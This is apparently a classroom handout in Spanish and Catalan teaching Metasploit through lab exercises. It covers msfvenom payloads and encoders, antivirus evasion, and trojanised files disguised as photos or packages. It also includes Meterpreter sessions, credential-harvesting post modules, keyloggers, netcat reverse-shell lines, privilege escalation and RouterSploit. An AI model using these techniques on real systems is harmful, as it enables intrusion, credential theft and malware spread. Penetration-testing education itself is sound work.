Metasploit

<u>Introducción</u>

Metasploit (https://www.metasploit.com) es una herramienta para penetrar máquina remotas mediante el uso de exploits. Un **exploit** es un programa (también llamado "shellcode") que explota una o varias vulnerabilidades en un software determinado para, en la mayoría de ocasiones, intentar ganar acceso a un sistema y tener un nivel de control sobre él. La acción concreta a realizar sobre el sistema "exploitado" viene definida por el payload utilizado. Un **payload** (también llamado "listener" o "rootkit") es un programa que acompaña a un exploit para realizar funciones especificas una vez el sistema objetivo es comprometido; normalmente es un shell más o menos "customizado". La elección de un buen payload es una decisión muy importante a la hora de aprovechar y mantener el nivel de acceso obtenido en un sistema. Como en muchos sistemas existen firewalls, antivirus y sistemas de detección de intrusos que pueden dificultar la actividad de algunos payloads, estos se suelen codificar mediante determinados "**encoders**", los cuales modifican la apariencia binaria del payload para así conseguir hacerlo pasar desapercibido en el sistema.

Metasploit dispone de una base de datos donde se encuentran clasificados centenares de exploits conocidos, clasificados en una jerarquía que los diferencia según error que vulneren, el sistema operativo, etc. La base de datos de exploits (https://github.com/offensive-security/exploit-database) puede actualizarse desde Internet o a través de la página web del programa. A partir de ella se puede elegir el exploit deseado y generarlo "ad-hoc" según los parámetros que se necesiten. En la generación de cualquier exploit, un paso casi siempre imprescindible es la vinculación de este con un determinado "payload", a elegir también de una lista que Metasploit ofrece de serie. De hecho, los mismos desarrolladores de Metasploit también son los responsables de un payload muy completo llamado Meterpreter.

No siempre es necesario generar la pareja exploit+payload(+encoder); si el atacante consigue que sea el propio usuario incauto el que ejecute el payload(+encoder) en el sistema (mediante el uso de enginería social -por ejemplo a través del envío al usuario incauto de un enlace al binario para que se lo descargue y lo ejecute pensando que es una foto de gatitos- o de cualquier otro método), la tarea del exploit (que básicamente es poder implantar el payload) ya nos la habrá realizado el usuario incauto y, por tanto, ya no será necesario generarlo: bastará solo con distribuir el payload(+encoder) camuflado dentro de algún programa aparentemente legítimo (o de cualquier otro tipo de fichero como una foto, un archivo multimedia, etc) y ya está.

Instalación

Metasploit ofrece un shell script que se encarga de detectar la versión y tipo de distribución del sistema actual para añadir el repositorio propio apropiado y así descargar los paquetes necesarios para realizar la instalación de todo el entorno. Los pasos para realizar esta instalación automatizada de Metasploit (en Ubuntu o Fedora Server) son:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall && sudo ./msfinstall

Los binarios instalados se ubicarán en la carpeta "/opt/metasploit-framework/bin", por lo que, o bien se añade esta carpeta al PATH del sistema o bien habrá que indicar la ruta exacta del binario a usar en cada momento. Por ejemplo, se puede actualizar la instalación de Metasploit en cualquier momento con uno de los binarios allá presentes, el comando ./msfupdate

NOTA: Para que Metasploit funcione correctamente, es recomendable deshabilitar previamente el cortafuegos (*sudo systemctl --now disable ufw* en Ubuntu, *sudo systemctl -now disable firewalld* en Fedora) y, además, en Fedora, deshabilitar SELinux (*sudo sed -i "s/=enforcing/=disabled/g" /etc/selinux/config"* && *sudo systemctl reboot*).

Primeros pasos: creación de un payload con msfvenom

El comando que ofrece Metasploit para generar payloads (codificados) es *msfvenom* (se puede ejecutar como usuario normal) . Una vez generado, ya podremos enviarlo al sistema de la víctima para intentar lograr que ésta lo ejecute de alguna manera inadvertidamente. El comando *msfvenom* tiene los siguientes parámetros:

-p : Sirve para indicar el tipo de payload que deseamos generar. La lista de los tipos de payloads ofrecidos por Metasploit se puede obtener ejecutando el comando *msfvenom -l payloads*. Los nombres de cada payload mostrado en esta lista informan de dos características de ese payload en particular que debemos tener en cuenta a la hora de elegirlo: el sistema-víctima donde esperamos ejecutarlo y el modo de conexión que establecerá con la máquina-controladora del atacante. Así, nos podemos encontrar con payloads pensados para ser ejecutados en sistemas Linux de 64 bits (que es lo que probaremos más en los ejercicios), como por ejemplo, entre muchos otros,...:

linux/x64/meterpreter/bind_tcp linux/x64/meterpreter/reverse_tcp linux/x64/meterpreter_reverse_tcp linux/x64/meterpreter_reverse_http linux/x64/meterpreter_reverse_https linux/x64/shell/bind_tcp linux/x64/shell_bind_tcp linux/x64/shell_bind_tcp linux/x64/shell_reverse_tcp linux/x64/shell_reverse_tcp

NOTA: "Meterpreter" is the official Metasploit payload, which runs an interactive shell with its own commands. "Shell" runs the /bin/sh shell instead. "Exec" simply runs an specified command.

NOTA: A "reverse" shell (also known as a connect-back) requires the attacker to set up a listener first on his box, the target machine must act as a client connecting to that listener so that the attacker receives the shell. A "bind" shell is is the exact opposite: it's the kind that opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session; this kind of shells are helpful in case attacker get disconnected from victim machine while it is still running: attacker can execute the same command and get back the session without any intervention of the victim to run the exploit again. A reverse shell, instead, it's the only opton if target machine is behind another private network, or if target machine's firewall blocks incoming connections to the shell, or the payload is unable to bind to the port it wants due to whatever the reason, etc.

NOTA: "http", "https" or "tcp" are the kind of tunnel where communication between payload and attacker's control software (often Metasploit's console) is done. Los payloads "*_reverse_http" y "*_reverse_https" permiten aparentar que el tráfico generado por Meterpreter es "normal" (por ser de tipo web): if the victim has blocked all the ports the payload can still communicate with attacker machine through (nearly always) uncensored ports 80 and/or 443. Moreover, since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.

NOTA: Generally, if the payload's name is splitted between a "/", such as in "shell/tcp_bind", it is a "staged" payload. In this case, "tcp_bind" would be the stager (see below) and "shell" is the staged. Unfortunately, this convention is not used consistently in Metasploit, so one often has to go to the "info" section of the payload or find the directory it is in to determine if it is a staged payload or not ("stageless"). La diferencia entre los payloads "staged" y "stageless" (estos últimos también llamados "inline") está en que los primeros use tiny "trampolines" called "stagers" which fit into small exploitation spaces so, if the victim's system exploitation buffer or other memory area is very small and only allows a small amount of code to be executed, first a small stager is placed in this memory area to set up the connection and then, this stager "pulls" the rest of the payload after this foothold is made on the victim system. These larger staged payloads include such complex payloads as the Meterpreter and VNC Injection, both of which include large and complex code. A non-staged shell, however, is sent over in one block: you just send shell in one stage.

...o en servidores web capaces de interpretar páginas PHP, como por ejemplo, entre muchos otros,...:

php/meterpreter/bind_tcp php/meterpreter/reverse_tcp php/meterpreter_reverse_tcp php/exec

```
...o código Python...:
        python/meterpreter/bind tcp
        python/meterpreter/reverse http
        python/meterpreter/reverse_https
        python/meterpreter/reverse_tcp
        python/meterpreter/reverse_tcp_ssl
        python/meterpreter bind tcp
        python/meterpreter reverse http
        python/meterpreter_reverse_https
        python/meterpreter_reverse_tcp
        python/shell_bind_tcp
        python/shell_reverse_tcp (equivalente a "cmd/unix/reverse_python")
                 NOTA: De forma similar encontramos otros payloads con código interpretado en shell, como
                 "cmd/unix/reverse_bash" (directamente en Bash) "cmd/unix/reverse_perl" (mediante Perl)
        python/shell reverse tcp ssl
        python/shell reverse udp
...o incrustados dentro del propio navegador...:
        firefox/shell_bind_tcp
        firefox/shell reverse tcp
        firefox/exec
...o en sistemas Android específicamente, entre varios más,...:
        android/meterpreter/reverse http
        android/meterpreter/reverse https
        android/meterpreter/reverse_tcp
        android/meterpreter_reverse_http
        android/meterpreter_reverse_https
        android/meterpreter reverse tcp
        android/shell/reverse http
        android/shell/reverse_https
        android/shell/reverse tcp
```

...o, lo más común, en sistemas Windows, donde podemos encontrar los mismos "payloads" que en sistemas Linux sólo que empezando su nombre con la palabra "windows", así: "windows/x64/meterpreter/bind_tcp", etc (además de otros que incluyen, por ejemplo, el uso de PowerShell - https://docs.microsoft.com/en-us/powershell - y más).

Después de indicar el tipo de payload a generar tras el parámetro -p, a continuación se deberán indicar (uno tras otro separados por espacios) los posibles parámetros que este requiera. Por ejemplo suelen ser muy habituales en los payloads de tipo "reverse" los parámetros LHOST y LPORT, los cuales sirven para indicar, respectivamente, la IP y puerto de la máquina atacante hacia donde el payload deberá realizar la conexión una vez integrado en la máquina víctima. En el caso de los payloads de tipo "bind" los parámetros más habituales son RHOST y LPORT para indicar, respectivament, la IP de la máquina víctima y el puerto local del atacante hacia donde el payload conectará. Para saber exactamente qué parámetros necesita un determinado tipo de payload, se puede ejecutar msfvenom -p nombrePayload --payload-options

NOTA: Es posible usar en vez de RHOST el parámetro RHOSTS para indicar múltiples víctimas. La sintaxis para indicar sus múltiples IPs es la misma que la utilizada en el comando nmap. También es posible usar, como alternativa, un fichero conteniendo la lista de IPs a atacar indicando el valor <u>file://...</u>

En el caso de usar un payload "stageless" de tipo "bind", en la máquina del atacante podríamos obtener un shell remoto simplemente ejecutando netcat en nuestra máquina así: *nc* 192.168.1.101 5555 y suponiendo que en la víctima el payload hiciera algo similar a esto: *nc* -*vlp* 5555 -*e* /*bin/bash* (aunque también podríamos usar Meterpreter empleando el método explicado en el siguiente párrafo). En el caso de usar un payload "stageless" de tipo "reverse", podríamos obtener un shell remoto igualmente ejecutando netcat, pero esta vez así: *nc* -*lvp* 5555 , y suponiendo que en la víctima el payload hiciera algo similar a esto: *nc* 192.168.1.101 5555 -*e* /*bin/bash* (aunque también podríamos usar Meterpreter tal como se explica en el siguiente párrafo),

En el caso de usar un payload "staged" no podemos usar netcat. En este caso, si usamos concretamente el payload Meterpreter, los pasos a seguir en la máquina atacante para disfrutar del acceso remoto proporcionado por el payload ya ejecutado en el sistema víctima son, tras ejecutar el comando ./msfconsole:

- -f: Formato final del payload. La lista completa de formatos posibles se puede obtener ejecutando el comando *msfvenom -l formats*. Entre los más habituales encontramos "exe", "dll", "psh", "msi" o "vba" (para Windows) y "elf" (para Linux)" pero también tenmos "bash"/"sh", "c", "hex", "csharp", "java"/"jar"/"jsp", "py"/"python", "pl"/ "perl" o "raw" (usado para payloads de tipo "php"), etc.
- -e: Opcional. "Encoder" a usar para camuflar el payload. La mayoría de ellos transforman el código Assembler del binario infectado de manera que sea más difícil encontrar marcas de la presencia del payload (los payloads, por lo general, suelen estar muy estudiados y por tanto son fácilmente reconocibles dentro de un código Assembler sin codificar). Se clasifican por la arquitectura de la máquina víctima (cada encoder solo suele ser útil para una determinada plataforma: x86, x86_64, etc). La lista de los tipos de payloads ofrecidos por Metasploit se puede obtener ejecutando el comando *msfvenom -l encoders*. Allí podremos ver de diferentes tipos según la arquitectura: "x86/...", "x64/..." (por ejemplo, "x64/xor", "php/base64",...). Por otro lado, también podemos añadir además el parámetro -i nº, donde nº indica el número de veces que se aplicará el "encoder" al "payload" (en principio, cuantas más, más difícil de detectar será)

NOTA: Si se quiere, no obstante, tener una protección más profesional, es más recomendable utilizar herramientas especializadas en el camuflaje de binarios anti-AV, como por ejemplo Veil (https://github.com/Veil-Framework/Veil)

NOTA: La manera más sencilla de saber si nuestro payload será detectado por las máquinas víctimas es buscando en el servicio Virus Total (https://www.virustotal.com) el hash MD5 de nuestro payload (¡no lo subáis porque entonces Virus Total ya tendrá constancia de él!). Recordad que este hash se puede obtener mediante el comando *md5sum*.

- -x : Opcional. Archivo original legítimo que se usará como plantilla para incrustar en su interior de forma invisible (a modo de "alien") el payload indicado previamente. Este archivo puede ser un ejecutable, una foto, etc. Por defecto msfvenom utiliza las plantillas ubicadas dentro de la carpeta "data/templates", en su directorio de instalación.
- -o: Ruta del fichero distribuible a las víctimas con el payload generado en su interior

NOTA: El comando *msfvenom* tiene muchos otros parámetros opcionales más, como por ejemplo -a (para indicar la arquitectura donde se piensa ejecutar el payload -x64,...-; si no se indica esta se deduce del nombre del payload utilizado), --platform (para indicar el sistema donse se piensa ejecutar el payload -linux,windows,...-; si no se indica se deduce del nombre del payload utilitzado),etc. Se puede consultar una lista de todos los parámetros posibles con *msfvenom* -h

Si quisiéramos mantener una conexión entre un payload ejecutándose en una máquina víctima separada de nuestra máquina atacante por una red WAN (como Internet) es necesario realizar un par de ajustes:

- *Como valor de LHOST hay que indicar la IP pública de nuestro router (este valor se puede obtener por ejemplo visitando http://whatismyip.com). Lo ideal sería utilizar un servicio como No-IP y usar en vez de ese valor, que puede variar en cualquier momento, el nombre DNS asociado, el cual siempre es fijo.
- *Para que el valor de LPORT funcione, es necesario realizar una redirección de puertos en la configuración de nuestro router. Otra opción es utilizar soluciones que trabajan detrás de NAT, como ngrok (https://ngrok.com) o pagekite (https://pagekite.net)

Primeros pasos: creación y ejecución de un exploit con msfconsole

El comando que ofrece Metasploit para generar exploits, asociándoles un determinado payload (invocando para ello en ese momento internamente al comando *msfvenom*) y de ejecutarlos contra una víctima es **msfconsole**. Tal como ya hemos dicho, el hecho de generar un exploit+payload nos permitirá no tener que introducir manualmente dicho payload en el ordenador de la víctima (o hacer que un usuario incauto lo tenga que hacer por nosotros) sino que esa introducción será completamente transparente (y realizada de forma remota).

El comando ./msfconsole se puede utilizar (siempre como usuario normal!) de forma interactiva entrando en una consola propia al ejecutarlo sin más o bien de forma no interactiva indicándole mediante el parámetro -x todos los comandos que necesite de un solo golpe (separados entre sí por ";"). En general utilizaremos la primera manera por darnos más posibilidades.

NOTA: La primera vez que se ejecuta ./msfconsole nos hará un par de preguntas interactivas:

- 1) Si deseamos generar una base de datos local interna (se guardará dentro de la carpeta "~/msf4/db") para ir guardando las características de los diferentes exploits, payloads y ataques en general disponibles en nuestro Meterpreter (muy recomendable)
- 2) El nombre de usuario y contraseña para el acceso vía REST API a dicha base de datos, la cual se podrá utilizar yendo a https://localhost:5443/api/v1/auth/account

Per més informació, consulteu https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service

Los comandos internos de la consola más habituales son:

: Muestro lista de comandos disponibles help comando : Muestro ayuda del comando indicado search type:exploit platform:windows adobe pdf : Busco en la base de datos local todos los exploits disponibles para sistemas Windows utilizando como filtros las palabras "adobe" v "pdf" : Muestro lista de exploits disponibles en BD local show exploits : Muestro lista de payloads disponibles en BD local show payloads show encoders : Muestro lista de encoders disponibles en BD local : Muestro lista de los módulos auxiliares " " " show auxiliary : Busca palabra en la salida del comando indicado grep palabra comando (normalmente de tipo show o info) use nombreExploit : Elijo el exploit indicado. A partir de aquí: show options : Muestro lista de opciones del exploit elegido show targets : Muestro la lista de sistemas operativos vulnerables a ese exploit (si es de tipo "multi/browser" o similar) : Muestro toda la información sobre ese exploit info set payload nombre/payload : Asocio un payload concreto a ese exploit set nombreOpcion valor : Establezco un valor concreto a la opción indicada : Ejecuto el exploit. Haciendo run -z se ejecutará en run segundo plano : Listo las sesiones remotas abiertas sessions -l sessions -i nº : Entro en el shell/payload de la sesión indicada : Pongo la sesión activa en 2º plano para volver al background prompt de msfconsole : Vuelvo al prompt inicial de msfconsole back deshaciendo la configuración o contextodel exploit que estuviera a medias connect ip n°puerto : Equivalente al cliente netcat sin salir de msfconsole

NOTA: Metasploit has seven different types of modules. These are: "payloads", "exploits", "encoders", "post", "nops", "auxiliary" and "evasion". "Post" are modules that we can use post exploitation of the system. "Nops" are short for No OperationS and it simply means "do nothing"; this can be crucial in creating a buffer overflow. "Auxiliary" includes numerous modules that don't fit into any of the other categories: these include such things are fuzzers, scanners, denial of service attacks, and more. "Evasion" permeten generar "mutacions" dinàmiques als payloads que dificulten la seva detecció per antivirus.

<u>Primeros pasos: Uso de Meterpreter</u>

Meterpreter (https://github.com/rapid7/metasploit-payloads) automatically self-attaches to a target process while it is running in memory, leaving no trace of its existence on the hard drive or file system. To know which is the current target process you must execute getpid command. However, very often you will want to attach Meterpreter to another process with more privileges on the system and with an more lastingexpected time-life (like sychost.exe in Windows, for instance). To achieve this, you can first get the list of current processes in target system with ps command (note it's possible to filter ps's output with regular expressions, like ps $^{\wedge}f.^{*}$, for instance) and then, "migrate" to selected new target process with migrate $n^{o}PID$ command.

Other interesting commands are:

```
sysinfo
getuid
pwd
cd carpeta
ls
lpwd
lcd carpeta
mkdir carpeta
rmdir carpeta
upload [-r] ficheroOcarpetaMaqHacker ... carpetaMaqVictima
download [-r] ficheroOcarpetaMaqVictima... carpetaMaqHacker
edit fitxer (obre l'editor per defecte de la màquina atacant, que ve donat per $EDITOR -típicament vi-)
kill n°PID
execute -f/ruta/programa [-a "arg1 arg2 ..."]
ipconfiq
shutdown o reboot
shell
run algun/modulo/de/tipo/post
resource fitxer.txt (executa en pwd un conjunt de comandes Meterpreter escrites en el fitxer indicat,
                   que estarà ubicat a lpwd)
exit
```

A more complete list can be found in https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-command-cheat-sheet-for-metasploits-meterpreter-0149146. With *help* you can obtain the list of available commands in current Meterpreter session.

EXERCICIS:

1.-a) A la màquina virtual on hagis instal.lat Metasploit (i que tingui la seva tarja de xarxa en mode "adaptador pont") executa (com usuari normal, no cal ser root) la comanda *msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=ip.Maq.Virt -f elf -o ~/jajaja* a la teva màquina virtual

NOTA: Executant la comanda *msfvenom -p linux/x64/meterpreter/reverse_tcp -l payloads* pots observar que, per defecte, LPORT val 4444, així que si ja ens està bé aquest valor no cal canviar-ho

- **b)** Copia el binari jajaja de la màquina virtual a la màquina real (que serà la màquina a "infectar") de la manera que vulguis (via SSH, via mail, via pendrive, via netcat, etc) i dóna-li permisos d'execució.
- **c)** A la màquina virtual executa (com usuari normal, no cal ser root) la comanda *msfconsole* , i a la consola interactiva escriu les comandes necessàries per restar a l'espera de la connexió del payload. És a dir, escriu:

```
msf5 > use exploit/multi/handler
msf5 exploit(handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(handler) > set LHOST ip.Maq.Virt
msf5 exploit(handler) > show options
msf5 exploit(handler) > run
```

d) Fes doble clic sobre el binari "jajaja" a la màquina real i comprova que, inmediatament, apareix una consola Meterpreter dins de msfconsole. Executa les següents comandes Meterpreter i digues què fan:

sysinfo aetuid pwd cd /var ls lpwd lcd/var mkdir pepe rmdir pepe upload /etc/fstab /var download /etc/fstab /var cat /etc/passwd edit /etc/passwd kill 1234 ipconfig shell exit

NOTA: Si surts de Meterpreter, per tornar a entrar, a la màquina víctima hauràs d'executar un altre cop el binari "jajaja" i a la consola de Metasploit caldrà simplement que escriguis *run* un altre cop (perquè les dades de configuració del darrer exploit emprat es guarden). De totes formes, si no es vol que en tancar el Meterpreter el binari "jajaja" deixi de funcionar (i per tant, que es perdi la connexió ja establerta per un eventual atac futur), es pot afegir com opció del payload "linux/x64/meterpreter/reverse_tcp" (i de molts altres), abans d'executar la comanda *run*, aquesta: *set ExitOnSession false*

NOTA: Para que en la salida del comando *ps* de la máquina víctima salga nuestro payload con otro nombre, al incluirlo en la mayoría de exploits se les puede añadir la opción *PayloadProcessCommandLine="monkey -n 123"* Para saber si esto se puede hacer con el exploit particular que tengamos seleccionado se puede ejecutar el comando **show advanced** para ver las opciones avanzadas más allá de las mostradas por *show options*

e) Executa la comanda *ss -tn* a la màquina real (la víctima) i observa quin port hi manté obert el binari jajaja mentre està en marxa. ¿Per què creus que és aquest? Pista: pensa en els possibles tallafocs. D'altra banda, obre el Wireshark de la màquina real i observa quin tipus de tràfic apareix entre aquesta i la màquina virtual (l'atacant). ¿És d'algun tipus reconegut?

2.-a) Crea a la màquina virtual (la màquina atacant) un arxiu anomenat "pepe.rc" amb el següent contingut:

use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST ip.Maq.Virt run

b) Executa la comanda *msfconsole -r pepe.rc* i seguidament fes doble clic sobre el binari "jajaja" a la màquina real i comprova que, inmediatament, apareix una consola Meterpreter dins de msfconsole igual que passava a l'exercici anterior.

NOTA: També es pot executar l'script "pepe.rc" ja dins de mfsconsole amb la comanda interna resource pepe.rc

c) La gràcia de mantenir una sessió Meterpreter no només és poder executar les comandes que proporciona sinó també fer ús dels mòduls de "post-explotació" que hi ha disponibles a Metasploit. Amb la sessió Meterpreter oberta, executa les següents comandes i digues què n'obtens:

run post/linux/gather/enum_system run post/linux/gather/enum_protections run post/linux/gather/enum_network run post/linux/gather/enum_configs run post/linux/gather/checkvmuse run post/multi/gather/firefox_creds run post/multi/gather/ssh_creds run post/linux/manage/iptables_removal

El problema principal dels exercicis anteriors és que hem hagut de copiar i executar manualment el binari "jajaja" en la màquina víctima. L'ideal seria que això es fes de forma automàtica. Però per això la màquina víctima ha de proporcionar un mètode vulnerable per deixar introduir-se el payload i executar-lo; això se sol aconseguir explotant alguna vulnerabilitat d'algun determinat servei (SSH, HTTP, NFS, etc) que "obri la porta".

3.-a) Executa a la teva màquina virtual la comanda *msfvenom -p php/meterpreter/reverse_tcp LHOST=ip.Maq.Virt -f raw -o shell.php* i seguidament observa el contingut del fitxer "shell.php" generat. ¿Què veus?

NOTA: Recordeu que podem fer servir altres tipus de "payload" capaç igualment d'obrir una sessió Meterpreter depenent del tipus de víctima, com ara python/meterpreter/reverse_tcp. O fins i tot android/meterpreter/reverse_tcp. En aquest darrer cas, no obstant, we also need to sign certificate because Android mobile devices are not allowing installing apps without the appropriately signed certificate: android devices only install the signed .apk files. For signing the apk file, you can use jar signer, keytool and zipalign tools

b) ¿ Per a què voldries combinar el resultat anterior amb l'execució, dins de *msfconsole*, del mòdul "auxiliary/scanner/http/http_put" (amb la configuració adient, comprova-la amb *show options...*les úniques opcions que necessites establir són *FILEDATA file://ruta/fitxer/shell.php*, *RHOSTS* i, opcionalment, *PATH* i *FILENAME*) contra el servidor Apache de la teva màquina real? Prova-ho. ¿Pots comprometre el servidor web? Si és que sí, ¿pots entrar en una sessió Meterpreter?

NOTA: Podeu trobar més informació a https://www.hackingtutorials.org/exploit-tutorials/metasploitable-3-exploiting-http-put

c) ¿Quina diferència observes en el contingut dels payloads generats per les següents comandes (i mostrat a pantalla): msfvenom -p cmd/unix/reverse_python -f raw , msfvenom -p python/shell_reverse_tcp -f raw i msfvenom -p python/shell reverse tcp -f py

d) Ara prova d'executar a la màquina virtual la comanda *msfvenom -p cmd/unix/reverse_bash LHOST=ip.Maq.Virt -f raw -o shell.sh* i seguidament observa el contingut del fitxer "shell.sh" generat. ¿Què veus? ¿Com el faries servir a la màquina víctima?

NOTA: També podríem haver fet servir el payload "cmd/unix/reverse_python"

4.-a) ¿Per a què serviria aquest payload: *windows/vncinject/reverse_tcp* ? Pots fer servir la comanda *info* de msfconsole

NOTA: Per provar exploits en sistemes Windows es pot descarregar una màquina Windows oficial des d'aquí: https://developer.microsoft.com/en-us/windows/downloads/virtual-machines

b) Suposant que ja has compromés una màquina víctima Windows ¿per a què serviria el mòdul *post/windows/capture/lockout keylogger*? Pots fer servir la comanda *info* de msfconsole

NOTA: Un altre mòdul amb similars objectius és post/windows/capture/keylog_recorder

c) ¿Per a què serveixen els següent mòduls? Pots fer servir la comanda info de msfconsole

auxiliary/scanner/mysql/mysql version auxiliary/scanner/mysql/mysql login auxiliary/scanner/ssh/ssh version auxiliary/scanner/ssh/ssh_login auxiliary/scanner/http/http_version auxiliary/scanner/http/http_login auxiliary/scanner/http/ssl auxiliary/scanner/http/webdav_scanner (per saber què és webdav pots veure https://desarrolloactivo.com/articulos/ webdav) auxiliary/scanner/http/webdav_website_content auxiliary/scanner/http/robots_txt (per saber per a què serveix el fitxer "robots.txt" pots veure http://www.robotstxt.org) auxiliary/scanner/http/dir_listing, auxiliary/scanner/http/dir_scanner i auxiliary/scanner/http/files_dir auxiliary/scanner/http/wordpress_login_enum auxiliary/scanner/smb/smb_version auxiliary/scanner/smb/smb_login auxiliary/scanner/smb/smb_lookupsid auxiliary/scanner/smb/smb enumshares i auxiliary/scanner/smb/smb enumusers auxiliary/scanner/vnc/vnc_none_auth auxiliary/sniffer/psnuffle auxiliary/server/browser autopwn2 auxiliary/server/capture/http auxiliary/server/capture/http_basic auxiliary/server/capture/http_javascript_keylogger auxiliary/server/capture/mysql o auxiliary/server/capture/postgresql auxiliary/server/capture/imap o auxiliary/server/capture/smtp auxiliary/server/capture/smb auxiliary/server/capture/vnc auxiliary/dos/dhcp/isc dhcpd clientid auxiliary/dos/http/apache_range_dos exploit/multi/script/web_delivery exploit/multi/misc/openoffice_document_macro exploit/multi/samba/usermap script

NOTA: La majoria dels mòduls anteriors només necessiten establir l'opció RHOSTS per indicar el servidor (o xarxa) a investigar però en algun cas necessiten alguna configuració addicional. Recomano executar *show options* per assegurar-se

Un problema que té l'accedir amb Meterpreter a la màquina víctima gràcies a l'execució del binari jajaja és que aquest accés es fa sent l'usuari que ha executat dit binari. Per tant, si aquest usuari no és administrador de la màquina, gaire cosa no podrem fer. Afortunadament, Metasploit incorpora uns quants mòduls de "post-explotació" que intenten, mitjançant l'aprofitament de vulnerabilitats conegudes, "escalar privilegis" i obrir una sessió com usuari administrador a la màquina atacada. Aquest és, de fet, l'objectiu primordial de qualsevol atac un cop trencada la barrera d'accés: convertir-se en "root" d'alguna manera no prevista. L'exercici següent intentarà aconseguir això a la màquina real.

- **5.-a)** Fes els passos necessaris per entrar en una sessió Meterpreter a la teva màquina atacant i seguidament posa la sessió Meterpreter en segon pla amb la comanda *background*
- **b)** Executa algun exploit d'escalada de privilegis amb la comanda *use exploit/linux/local/...* (on els punts suspensius pot ser el nom de qualsevol exploit que vegis que podria funcionar...recorda que els pots llistar amb *show exploits* i pots esbrinar-ne més amb *info*). Cada exploit tindrà els seus paràmetres particulars a establir, però un que serà obligatori és la vinculació amb la sessió Meterpreter que tinguem en marxa en aquell moment (en principi, serà la nº1 perquè no n'hi cap més). Aquesta vinculació s'estableix amb l'ordre *set session 1*. Un cop establerts tots els paràmetres, per procedir a l'intent d'escalada caldrà executar *run*
- c) Repeteix l'apartat anterior amb diversos exploits a veure si amb algun obten èxit
- d) Suposant que ja haguessis aconseguit escalar privilegis en una màquina víctima, ¿per a què creus que serviria executar-hi llavors les següents comandes Meterpreter (on l'script "infecter.sh" seria un de molt similar al mostrat aquí: https://thomas-leister.de/en/how-to-import-ca-root-certificate)?

 meterpreter> upload "/root/.bettercap/ca.pem"

 meterpreter> upload "/root/.bettercap/infecter.sh"

 meterpreter> shell
 apt install libnss3-tools
 /root/.bettercap/infecter.sh
- **6.-a)** Segueix els passos indicats a https://blog.rapid7.com/2012/02/21/metasploit-javascript-keylogger/ fent servir la web "Demo". Demana a un company que accedeixi a aquesta web. ¿Què passa? ¿Què és el que fa aquest mòdul a la víctima per tal de poder funcionar?
- **b)** Segueix els passos indicats a https://www.offensive-security.com/metasploit-unleashed/client-side-exploits i envia el PDF infectat a un company. Comprova si resulta compromès

NOTA: També pots provar amb algun altre mòdul dels inclosos dins de "exploit/multi/fileformat" o més en concret, "exploit/multi/misc/openoffice_document_macro"

- **c)** Segueix els passos indicats a https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan i envia el paquet deb infectat a un company. Comprova si resulta compromès.
- **7.-**¿Qué expliquen els articles https://medium.com/@woj_ciech/command-and-control-server-in-social-media-twitter-instagram-youtube-telegram-5206ce763950 i https://pentestlab.blog/2017/09/26/command-and-control-twitter? ¿Quina relació tenen amb l'eina https://github.com/maldevel/gdog?
- **8.-a)** ¿Per a què serveix aquest programa (http://www.angusj.com/resourcehacker) i com el faries servir per tal de què un fitxer executable Windows no tingués la icona d'executable i sí un thumbnail d'una foto? (per així enganyar a l'usuari fent-lo creure que aquell fitxer és una foto i no pas un executable)
- b) Llegeix https://github.com/rapid7/metasploit-framework/wiki/Python-Extension i digues què s'hi explica

Router exploitation works by breaching the security of a router, bypassing the administrative login page, and accessing administrative features. A skilled attacker can then target the existing firmware that runs the router in a practice called "rootkitting" in which a custom firmware is dropped into the router to enable advanced malicious features. Depending on the goals and resources of an attacker, this can include spying on the user and any connected devices, injecting malware into the browser to exploit connected devices, enabling advanced spear phishing attacks, and routing illegal traffic for criminal activities through exploited routers. You can see information about last bugs found in routers in https://routersecurity.org/bugs.php

9.-.RouterSploit (https://github.com/threat9/routersploit) is a Python program which automates most of the tasks associated with compromising a router and its commands will be familiar to anyone used to the Metasploit framework. It contains scanning and exploit modules. Instal.la'l a la màquina virtual executant les següents comandes:

```
sudo apt install python3-pip git
git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
```

NOTA: To upgrade you can do: cd routersploit && git pull

Seguidament, executa'l així: *cd routersploit && python3 rsf.py* Les comandes internes bàsiques són:

show all
use scanners/autopwn
show options
set ...
use exploits/...
run

Prova-les amb la porta d'enllaç del centre (192.168.15.10). If the exploit is successful, you should be greeted with internal configuration settings that can leak the login and password of users, default passwords, and device serial number, among other settings that allow you to compromise the router. Other modules allow you to remotely inject code or directly disclose the router password. Which you can run depends on what the target router is vulnerable to.

NOTA: Although Autopwn is a convenient feature, it tries a lot of different exploits and thus is very noisy on the network. The preferred option is to scan your target, do some recon, and only run the relevant modules for the manufacturer of the target router

Una vez obtenido acceso, es útil tener una lista de ficheros y comandos habituales para obtener información sobre en qué sistema estamos. En https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation y también en https://www.rebootuser.com/?p=1623 hay una bastante completa, la cual básicamente pretender contestar a las siguientes preguntas:

What is the distribution type, and version?

What is the Kernel version?

What services are running, and in which user-context?

What are the versions of the running services?

What applications are installed, and what versions?

Do any of these services have vulnerable plugins or configurations?

What jobs are scheduled?

What configuration files can be read/written in /etc/?

What information or content can be found in /var/?

Is it possible to write files to places that are in another users path?

Identify SUID and GUID files

Identify world-readable and world-writable files

How are file-systems mounted?

Are there any unmounted file-systems?

What sensitive files can be found?

Are there any passwords in; scripts, databases, configuration files or log files?

What user information can be found?

Can private-key information be found?

Examine files in user home directories (if possible)

What NICs does the system have?

What are the network configuration settings?

What other hosts are communicating with the system?

Are there any cached IP or MAC addresses?

Is packet sniffing possible, and if so what can be seen?

Is SSH tunnelling possible?

What development tools/languages are installed/supported?

What areas can be written to?

Where can code be executed?

How can files be uploaded?

From a defensive stance, you need to ask yourself very similar questions

Have you made any of the above information easy for an attacker to find?

Is the system fully patched? (Kernel, operating system, and all applications)

Are services running with the minimum level of privileges required?

Altres programes alternatius a Metasploit:

https://github.com/pavanw3b/sh00t

https://github.com/n1nj4sec/pupy

